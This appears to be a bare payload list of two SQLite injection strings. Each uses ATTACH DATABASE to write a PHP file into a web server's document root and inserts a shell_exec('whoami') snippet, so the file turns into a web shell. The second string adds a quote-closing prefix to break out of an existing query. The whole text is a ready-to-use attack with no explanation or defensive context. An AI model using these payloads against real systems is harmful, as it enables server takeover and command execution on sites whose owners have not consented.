ATTACH DATABASE '/var/www/html/lol.php' AS lol;CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('<? shell_exec("whoami"); ?>');--
');ATTACH DATABASE '/var/www/html/lol1.php' AS lol1;CREATE TABLE lol1.pwn1 (dataz text); INSERT INTO lol1.pwn1 (dataz) VALUES ('<? shell_exec("whoami"); ?>');--
